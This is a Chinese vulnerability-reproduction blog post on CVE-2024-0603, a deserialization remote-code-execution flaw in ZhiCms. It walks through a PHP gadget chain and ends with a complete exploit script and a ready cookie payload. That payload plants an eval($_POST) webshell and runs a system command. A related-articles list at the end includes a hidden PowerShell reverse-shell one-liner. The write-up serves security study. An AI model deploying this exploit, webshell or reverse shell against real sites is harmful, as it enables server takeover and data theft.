CVE-2024-0603 漏洞复现

CVE-2024-0603

源码:https://gitee.com/dazensun/zhicms

开题:

image-20240225052157569

CVE-2024-0603描述:ZhiCms up to 4.0版本的文件app/plug/controller/giftcontroller.php中存在一处未知漏洞。攻击者可以通过篡改参数mylike触发反序列化,从而远程发起攻击。该漏洞被公开披露,并可能被利用。此漏洞的相关标识为VDB-250839。

image-20240225053409514

链子就不自己挖了,直接用网上有的,自己复现理解一遍吧。

链子:

simple_html_dom::__destruct() -> simple_html_dom::clear() -> MemcacheDriver::clear() ->simple_html_dom_node::__toString() ->simple_html_dom_node::outertext() -> 
Template::display() -> Template::compile()

倒着分析,所有涉及代码如下:

\ZhiCms\base\Template.php

<?php
namespace ZhiCms\base;
class Template {protected $config =array();protected $label = null;protected $vars = array();protected $cache = null;public function __construct($config) {$this->config = $config;$this->assign('__Template', $this);$this->label = array(         /**variable label{$name} => <?php echo $name;?>{$user['name']} => <?php echo $user['name'];?>{$user.name}    => <?php echo $user['name'];?>*/  '/{(\\$[a-zA-Z_]\w*(?:\[[\w\.\"\'\[\]\$]+\])*)}/i' => "<?php echo $1; ?>",'/\$(\w+)\.(\w+)\.(\w+)\.(\w+)/is' => "\$\\1['\\2']['\\3']['\\4']",'/\$(\w+)\.(\w+)\.(\w+)/is' => "\$\\1['\\2']['\\3']",'/\$(\w+)\.(\w+)/is' => "\$\\1['\\2']",/**constance label{CONSTANCE} => <?php echo CONSTANCE;?>*/'/\{([A-Z_\x7f-\xff][A-Z0-9_\x7f-\xff]*)\}/s' => "<?php echo \\1;?>",/**msubstr label{musbstr str="test"  min="0" max="20"}   msubstr($str, 0, 20);**/'/{musbstr\s*str=(\S+)\+min=\"(.*)\"\+max=\"(.*)\"}/i'=>"<?php echo\\1;echo\\2;echo\\3;?>",/**if label{if $name==1}       =>  <?php if ($name==1){ ?>{elseif $name==2}   =>  <?php } elseif ($name==2){ ?>{else}              =>  <?php } else { ?>{/if}               =>  <?php } ?>*/              '/\{if\s+(.+?)\}/' => "<?php if(\\1) { ?>",'/\{else\}/' => "<?php } else { ?>",'/\{elseif\s+(.+?)\}/' => "<?php } elseif (\\1) { ?>",'/\{\/if\}/' => "<?php } ?>",/**for label{for $i=0;$i<10;$i++}   =>  <?php for($i=0;$i<10;$i++) { ?>{/for}                  =>  <?php } ?>*/              '/\{for\s+(.+?)\}/' => "<?php for(\\1) { ?>",'/\{\/for\}/' => "<?php } ?>",/**foreach label{foreach $arr as $vo}           =>  <?php $n=1; if (is_array($arr) foreach($arr as $vo){ ?>{foreach $arr as $key => $vo}   =>  <?php $n=1; if (is_array($array) foreach($arr as $key => $vo){ ?>{/foreach}                  =>  <?php $n++;}unset($n) ?> */'/\{foreach\s+(\S+)\s+as\s+(\S+)\}/' => "<?php \$n=1;if(is_array(\\1)) foreach(\\1 as \\2) { ?>", '/\{foreach\s+(\S+)\s+as\s+(\S+)\s*=>\s*(\S+)\}/' => "<?php \$n=1; if(is_array(\\1)) foreach(\\1 as \\2 => \\3) { ?>",'/\{\/foreach\}/' => "<?php \$n++;}unset(\$n); ?>",/**function label{date('Y-m-d H:i:s')}   =>  <?php echo date('Y-m-d H:i:s');?> {$date('Y-m-d H:i:s')}  =>  <?php echo $date('Y-m-d H:i:s');?> */'/\{([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff:]*\(([^{}]*)\))\}/' => "<?php echo \\1;?>",'/\{(\\$[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff:]*\(([^{}]*)\))\}/' => "<?php echo \\1;?>", );$this->cache = new Cache( $this->config['TPL_CACHE'] );}public function assign($name, $value = '') {if( is_array($name) ){foreach($name as $k => $v){$this->vars[$k] = $v;}} else {$this->vars[$name] = $value;}}public function display($tpl = '', $return = false, $isTpl = true ) {if( $return ){if ( ob_get_level() ){ob_end_flush();flush(); } ob_start();}extract($this->vars, EXTR_OVERWRITE);eval('?>' . $this->compile( $tpl, $isTpl));if( $return ){$content = ob_get_contents();ob_end_clean();return $content;}}	public function compile( $tpl, $isTpl = true ) {if( $isTpl ){$tplFile = $this->config['TPL_PATH'] . $tpl . $this->config['TPL_SUFFIX'];if ( !file_exists($tplFile) ) {throw new \Exception("Template file '{$tplFile}' not found", 500);}$tplKey = md5(realpath($tplFile));				} else {$tplKey = md5($tpl);}$ret = unserialize( $this->cache->get( $tplKey ) );	if ( empty($ret['template']) || ($isTpl&&filemtime($tplFile)>($ret['compile_time'])) ) {$template = $isTpl ? file_get_contents( $tplFile ) : $tpl;if( false === Hook::listen('templateParse', array($template), $template) ){foreach ($this->label as $key => $value) {$template = preg_replace($key, $value, $template);}		}$ret = array('template'=>$template, 'compile_time'=>time());$this->cache->set( $tplKey, serialize($ret), 86400*365);}	return $ret['template'];}
}

\ZhiCms\base\Cache.php

<?php
namespace ZhiCms\base;
class Cache{protected $config =array();protected $cache = 'default';public $proxyObj=null;public $proxyExpire=1800;protected static $objArr = array();public function __construct( $cache = 'default' ) {if( $cache ){$this->cache = $cache;}$this->config = Config::get('CACHE.' . $this->cache);if( empty($this->config) || !isset($this->config['CACHE_TYPE']) ) {throw new \Exception($this->cache.' cache config error', 500);}}public function __call($method, $args){if( !isset(self::$objArr[$this->cache]) ){		$cacheDriver = __NAMESPACE__.'\cache\\' . ucfirst( $this->config['CACHE_TYPE'] ).'Driver';if( !class_exists($cacheDriver) ) {throw new \Exception("Cache Driver '{$cacheDriver}' not found'", 500);}	self::$objArr[$this->cache] = new $cacheDriver( $this->config );}if( $this->proxyObj ){ //proxy mode$key = md5( get_class($this->proxyObj) . '_'.$method.'_' . var_export($args) );$value = self::$objArr[$this->cache]->get($key);if( false===$value ){$value = call_user_func_array(array($this->proxyObj, $method), $args);self::$objArr[$this->cache]->set($key, $value, $this->proxyExpire);}return $value;}else{return call_user_func_array(array(self::$objArr[$this->cache], $method), $args);}		}
}

\ZhiCms\ext\simple_html_dom.php

<?php
namespace ZhiCms\ext;
class simple_html_dom_node
{private $dom = null;function __toString(){return $this->outertext();}function outertext(){if ($this->dom && $this->dom->callback!==null){call_user_func_array($this->dom->callback, array($this));}}
}
class simple_html_dom
{public $callback = null;protected $parent;
// .......function __destruct(){$this->clear();}// .......function clear(){foreach ($this->nodes as $n) {$n->clear(); $n = null;}// This add next line is documented in the sourceforge repository. 2977248 as a fix for ongoing memory leaks that occur even with the use of clear.if (isset($this->children)) foreach ($this->children as $n) {$n->clear(); $n = null;}if (isset($this->parent)) {$this->parent->clear(); unset($this->parent);}if (isset($this->root)) {$this->root->clear(); unset($this->root);}unset($this->doc);unset($this->noise);}
// .......
}

ZhiCms\base\cache\MemcacheDriver.php

<?php
namespace ZhiCms\base\cache;
class MemcacheDriver implements CacheInterface{protected $mmc = NULL;protected $group = ''; protected $ver = 0;public function __construct( $config = array() ) {$this->mmc = new Memcache;if( empty($config) ) {$config['MEM_SERVER'] = array(array('127.0.0.1', 11211));$config['GROUP'] = '';}foreach($config['MEM_SERVER'] as $v) {call_user_func_array(array($this->mmc, 'addServer'), $v);}if( isset($config['GROUP']) ){$this->group = $config['GROUP'];}$this->ver = intval( $this->mmc->get($this->group.'_ver') );}public function get($key) {return $this->mmc->get($this->group.'_'.$this->ver.'_'.$key);}public function set($key, $value, $expire = 1800) {return $this->mmc->set($this->group.'_'.$this->ver.'_'.$key, $value, 0, $expire);}public function inc($key, $value = 1) {return $this->mmc->increment($this->group.'_'.$this->ver.'_'.$key, $value);}public function des($key, $value = 1) {return $this->mmc->decrement($this->group.'_'.$this->ver.'_'.$key, $value);}public function del($key) {return $this->mmc->delete($this->group.'_'.$this->ver.'_'.$key);}public function clear() {return  $this->mmc->set($this->group.'_ver', $this->ver+1); }	
}

==1、==首先看看链子的最末尾Template::display() -> Template::compile()

\ZhiCms\base\Template.php

有个eval方法,参数可控就可以导致RCE

image-20240225054507414

构造一下就可以使得eval可控,执行任意命令。构造如下:

class Template {protected $config =array();protected $label = null;protected $vars = array();protected $cache = null;public function __construct(){$this->cache = new Cache;$this->vars=array("tpl"=>"<?php system('cat /f*');?>","isTpl"=>false);}
}

2、simple_html_dom_node::outertext() -> Template::display()

代码有点多,是从这里跳过去到Template::display()的

image-20240225060157911

对应部分exp构造如下:

class simple_html_dom_node
{private $dom = null;public function __construct(){$dom = new simple_html_dom("");$dom->callback=array(new Template(), "display");$this->dom = $dom;}
}

3、simple_html_dom_node::__toString() ->simple_html_dom_node::outertext()

直接就能过去

image-20240225060522842

4、MemcacheDriver::clear() ->simple_html_dom_node::__toString()

image-20240225060912032

MemcacheDriver的clear()方法中将$this->group拼接字符串’_ver’,所以可以触发simple_html_dom_node中的__toString()方法

对应部分exp构造如下:

class MemcacheDriver
{protected $mmc = NULL;protected $group = '';protected $ver = 0;public function __construct(){$this->mmc = new Cache();$this->group = new simple_html_dom_node;}
}

5、simple_html_dom::clear() -> MemcacheDriver::clear()

image-20240225061918344

对应部分exp构造:

//.........namespace ZhiCms\ext;
use ZhiCms\base\cache\MemcacheDriver;
use ZhiCms\base\Template;
use zhicms\base\Cache;
class simple_html_dom
{protected $parent;public $callback = null;public function __construct($obj){$this->parent = $obj;}
}//.........$step = new MemcacheDriver;
$exp = new simple_html_dom($step);

6、simple_html_dom::__destruct() -> simple_html_dom::clear()

直接就能过去

image-20240225062151998

最终EXP:

<?php
namespace ZhiCms\base{class Cache{protected $config =array();protected $cache = 'default';public $proxyObj=null;public $proxyExpire=1800;public function __construct(){$this->config = array("CACHE_TYPE"=>"FileCache","MEM_GROUP"=>"tpl");}}class Template {protected $config =array();protected $label = null;protected $vars = array();protected $cache = null;public function __construct(){$this->cache = new Cache;$this->vars=array("tpl"=>'<?php eval($_POST[1]);?>',"isTpl"=>false);}}
}namespace ZhiCms\base\cache{use ZhiCms\ext\simple_html_dom_node;use ZhiCms\base\Cache;class MemcachedDriver{protected $mmc = NULL;protected $group = '';protected $ver = 0;public function __construct(){$this->mmc = new Cache();$this->group=new simple_html_dom_node();}}
}namespace ZhiCms\ext{use ZhiCms\base\cache\MemcachedDriver;use ZhiCms\base\Template;use ZhiCms\base\Cache;class simple_html_dom{protected $parent;public $callback;public function __construct($obj){$this->parent=$obj;}}class simple_html_dom_node{private $dom = null;public function __construct(){$dom=new simple_html_dom("");$dom->callback=array(new Template(),"display");// $dom->callback="phpinfo";$this->dom=$dom;}}$mem = new MemcachedDriver();$obj = new simple_html_dom($mem);echo urlencode(serialize($obj));
}

payload:

GET:?r=plug/gift/mylikeCookie:mylike=O%3A26%3A%22ZhiCms%5Cext%5Csimple_html_dom%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00parent%22%3BO%3A33%3A%22ZhiCms%5Cbase%5Ccache%5CMemcachedDriver%22%3A3%3A%7Bs%3A6%3A%22%00%2A%00mmc%22%3BO%3A17%3A%22ZhiCms%5Cbase%5CCache%22%3A4%3A%7Bs%3A9%3A%22%00%2A%00config%22%3Ba%3A2%3A%7Bs%3A10%3A%22CACHE_TYPE%22%3Bs%3A9%3A%22FileCache%22%3Bs%3A9%3A%22MEM_GROUP%22%3Bs%3A3%3A%22tpl%22%3B%7Ds%3A8%3A%22%00%2A%00cache%22%3Bs%3A7%3A%22default%22%3Bs%3A8%3A%22proxyObj%22%3BN%3Bs%3A11%3A%22proxyExpire%22%3Bi%3A1800%3B%7Ds%3A8%3A%22%00%2A%00group%22%3BO%3A31%3A%22ZhiCms%5Cext%5Csimple_html_dom_node%22%3A1%3A%7Bs%3A36%3A%22%00ZhiCms%5Cext%5Csimple_html_dom_node%00dom%22%3BO%3A26%3A%22ZhiCms%5Cext%5Csimple_html_dom%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00parent%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22callback%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A20%3A%22ZhiCms%5Cbase%5CTemplate%22%3A4%3A%7Bs%3A9%3A%22%00%2A%00config%22%3Ba%3A0%3A%7B%7Ds%3A8%3A%22%00%2A%00label%22%3BN%3Bs%3A7%3A%22%00%2A%00vars%22%3Ba%3A2%3A%7Bs%3A3%3A%22tpl%22%3Bs%3A24%3A%22%3C%3Fphp+eval%28%24_POST%5B1%5D%29%3B%3F%3E%22%3Bs%3A5%3A%22isTpl%22%3Bb%3A0%3B%7Ds%3A8%3A%22%00%2A%00cache%22%3BO%3A17%3A%22ZhiCms%5Cbase%5CCache%22%3A4%3A%7Bs%3A9%3A%22%00%2A%00config%22%3Ba%3A2%3A%7Bs%3A10%3A%22CACHE_TYPE%22%3Bs%3A9%3A%22FileCache%22%3Bs%3A9%3A%22MEM_GROUP%22%3Bs%3A3%3A%22tpl%22%3B%7Ds%3A8%3A%22%00%2A%00cache%22%3Bs%3A7%3A%22default%22%3Bs%3A8%3A%22proxyObj%22%3BN%3Bs%3A11%3A%22proxyExpire%22%3Bi%3A1800%3B%7D%7Di%3A1%3Bs%3A7%3A%22display%22%3B%7D%7D%7Ds%3A6%3A%22%00%2A%00ver%22%3Bi%3A0%3B%7Ds%3A8%3A%22callback%22%3BN%3B%7DPOST:1=system('tac /denfjkehfiofleffagww');

image-20240225065609842

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/42409.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【c++设计模式20】行为模式5:备忘录模式(Memento Pattern)

【c++设计模式20】行为模式5:备忘录模式(Memento Pattern) 一、定义二、适用场景三、过程四、备忘录模式类图五、C++示例代码六、使用注意事项原创作者:郑同学的笔记 原创地址:https://zhengjunxue.blog.csdn.net/article/details/132766604 qq技术交流群:921273910 类型…

python脚本“文档”撰写——“诱骗”ai撰写“火火的动态”python“自动”脚本文档

“火火的动态”python“自动”脚本文档&#xff0c;又从ai学习搭子那儿“套”来&#xff0c;可谓良心质量&#x1f44d;&#x1f44d;。 (笔记模板由python脚本于2024年07月07日 15:15:33创建&#xff0c;本篇笔记适合喜欢钻研python和页面源码的coder翻阅) 【学习的细节是欢悦…

【学习笔记】程序设计竞赛

程序设计竞赛 文章目录 程序设计竞赛0x00 基本操作指南0x01 算法分析0x02 STL和基本数据结构栈队列集合map 0x03 排序插入排序归并排序&#xff08;Merge Sort)快速排序 0x04 搜索技术BFSDFS回溯与剪枝 深度迭代ID A*A star双向广搜 0x05 递推方程0x06 高级数据结构并查集二叉树…

Hi6602 恒压恒流SSR电源方案

Hi6602是一款针对离线式反激电源设计的高性能PWM控制器。Hi6602内集成有通用的原边恒流控制技术&#xff0c;可支持断续模式和连续模式工作&#xff0c;适用于恒流输出的隔离型电源应用中。Hi6602内部具有高精度65kHz开关频率振荡器&#xff0c;且带有抖频功能可优化EMI性能。H…

小笔记(1)

反弹监听 # PowerShell反弹命令 powershell -nop -W hidden -noni -ep bypass -c "$TCPClient New-Object Net.Sockets.TCPClient(127.0.0.1, 80);$NetworkStream $TCPClient.GetStream();$StreamWriter New-Object IO.StreamWriter($NetworkStream);function WriteTo…

17.优化算法之解决拓扑排序4

0.基础 1.课程表1 207. 课程表 - 力扣&#xff08;LeetCode&#xff09; class Solution {public boolean canFinish(int n, int[][] p) {// 1. 准备⼯作int[] in new int[n]; // 统计每⼀个顶点的⼊度Map<Integer, List<Integer>> edges new HashMap<>…

第六十周:文献精读

目录 摘要 Abstract 文献阅读&#xff1a;可解释多水平时间序列预测的时间融合Transformer 一、多水平预测&#xff08;Multi-horizon forecasting&#xff09; 二、过去相关研究 三、现存问题 四、提出方法 五、模型架构 1、门控残差网络(GRN) 2、变量选择网络 3、…

android中activity与fragment之间的各种跳转

我们以音乐播放、视频播放、用户注册与登录为例【Musicfragment&#xff08;音乐列表页&#xff09;、Videofragment&#xff08;视频列表页&#xff09;、MusicAvtivity&#xff08;音乐详情页&#xff09;、VideoFragment&#xff08;视频详情页&#xff09;、LoginActivity&…

开始尝试从0写一个项目--后端(二)

实现学生管理 新增学生 接口设计 请求路径&#xff1a;/admin/student 请求方法&#xff1a;POST 请求参数&#xff1a;请求头&#xff1a;Headers&#xff1a;"Content-Type": "application/json" 请求体&#xff1a;Body&#xff1a; id 学生id …

OneFormer

按照INSTALL.md无法安装natten&#xff0c;不建议复现

1120 买地攻略

solution 土地需要连续&#xff0c;联想到用前缀和。用前缀和表示前i块土地的总价钱&#xff0c;易得任意片连续的土地价格 #include<iostream> using namespace std; const int maxn 1e4 10; int main(){int n, m, price[maxn] {0}, ans 0;scanf("%d%d"…

网络状态的智能感知:WebKit 支持 Network Information API 深度解析

网络状态的智能感知&#xff1a;WebKit 支持 Network Information API 深度解析 在现代 Web 应用中&#xff0c;理解用户的网络连接状态对于提供适应性体验至关重要。Network Information API&#xff0c;一个新兴的 Web API&#xff0c;允许 Web 应用访问设备的网络信息&…

creature_template_movement

creature_template_movement CreatureId 链接 creature_template.entry HoverInitiallyEnabled creature 模板是否允许初始悬浮状态&#xff0c;取值 0 / 1 Chase creature 模板的追逐运动状态 0&#xff1a;奔跑1&#xff1a;可行走2&#xff1a;始终行走 Random creature 模板…

IT高手修炼手册(4)PowerShell命令

一、前言 PowerShell是一个功能强大的命令行界面和脚本环境&#xff0c;它允许用户管理Windows操作系统和应用程序。 二、文件和目录操作 Get-ChildItem&#xff1a;列出指定路径下的文件和文件夹。简写为ls或dir。 Copy-Item&#xff1a;复制文件和文件夹。简写为copy或cp。 M…

python基础篇(8):异常处理

在Python编程中&#xff0c;异常是程序运行时发生的错误&#xff0c;它会中断程序的正常执行流程。异常处理机制使得程序能够捕获这些错误&#xff0c;并进行适当的处理&#xff0c;从而避免程序崩溃。 1 错误类型 代码的错误一般会有语法错误和异常错误两种&#xff0c;语法错…

Python文件写入操作

本套课在线学习视频&#xff08;网盘地址&#xff0c;保存到网盘即可免费观看&#xff09;&#xff1a; ​​https://pan.quark.cn/s/b19a7c910cf6​​ 在Python编程中&#xff0c;文件操作是一项基础且重要的技能。本文将详细介绍如何使用Python将列表内容写入文件以实现文件…

openmv的modbus0x10功能码疑问

代码位于&#xff1a;openmv/scripts/libraries/modbus.py https://github.com/openmv/openmv/blob/master/scripts/libraries/modbus.py REQUEST self.uart.read()if debug:print("GOT REQUEST: ", REQUEST)additional_address REQUEST[0]error_check REQUEST[-…

演化计算的学习

一、概念 演化计算是一种基于生物进化原理的计算方法&#xff0c;旨在通过模拟自然选择、遗传变异和繁殖等生物进化过程来解决复杂的优化问题。 它主要包括遗传算法、进化策略和遗传编程等。遗传算法通过对染色体&#xff08;解的编码&#xff09;的操作&#xff0c;如选择、交…

数据统计与数据分组18-25题(30 天 Pandas 挑战)

数据统计与数据分组 1. 知识点1.18 分箱与统计个数1.19 分组与求和统计1.20 分组获取最小值1.21 分组获取值个数1.22 分组与条件查询1.23 分组与条件查询及获取最大值1.24 分组及自定义函数1.25 分组lambda函数统计 2. 题目2.18 按分类统计薪水&#xff08;数据统计&#xff09…

ESP32CAM物联网教学10

ESP32CAM物联网教学10 MicroPython 应用体验 小智偶然地发现&#xff0c;有一种新兴的编程模式MicroPython&#xff0c;也能编写ESP32Cam的应用程序了&#xff0c;于是欣然地体验了一把。 编程环境搭建 小智偶然地从下面这家店铺买了一块ESP32Cam&#xff0c;并从客服那里得到…